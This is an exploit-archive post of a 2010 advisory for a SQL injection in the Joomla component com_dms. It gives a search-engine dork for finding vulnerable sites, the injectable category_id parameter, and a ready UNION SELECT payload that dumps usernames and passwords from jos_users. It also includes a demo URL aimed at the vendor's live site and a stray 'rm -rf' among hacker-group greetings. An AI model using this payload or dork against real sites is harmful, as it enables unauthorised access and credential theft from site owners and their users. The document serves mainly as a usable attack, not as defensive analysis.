|    |    |    | Today: 18-Nov-2019 |

Joomla Component com_dms Remote SQL injection vulnerability

January 30, 2010 | Posted in ExploitAlert

/**************************************************************************

[~] Joomla Component com_dms Remote SQL injection vulnerability - (category_id)
[~] Author : kaMtiEz (kamzcrew@yahoo.com)
[~] Homepage : http://www.indonesiancoder.com
[~] Date : 28 January, 2010


**************************************************************************/

[ Software Information ]

[+] Vendor : http://joomdonation.com/
[+] Info : http://joomdonation.com/index.php?option=com_content&view=article&id=41&Itemid=40
[+] version : 2.5.1 or lower maybe also affected
[+] Vulnerability : SQL injection
[+] Dork : inurl:"com_dms"
[+] Type : commercial
===========================================================================

[ Vulnerable File ]

http://127.0.0.1//index.php?option=com_dms&task=view_category&category_id=[INDONESIANCODER]


[ Exploit ]

-666+union+all+select+666,666,666,666,666,666,666,concat_ws(0x3a,username,password),666,666,666,666,666,666,666,666,666,666,666,666,666+from+jos_users--

[ Demo ]

http://dms.joomdonation.com/index.php?option=com_dms&task=view_category&category_id=-666+union+all+select+666,666,666,666,666,666,666,concat_ws(0x3a,username,password),666,666,666,666,666,666,666,666,666,666,666,666,666+from+jos_users--

===========================================================================

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah
[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzhack
[+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk

[ NOTE ]

[+] Babe enyak adek i love u pull dah ..
[+] Bercinta Sekuat Tenaga !
[+] rm -rf

[ QUOTE ]

[+] we are not dead INDONESIAN CODER stil r0x
[+] nothing secure ..

Taged in: component, injection, Joomla, Remote, vulnerability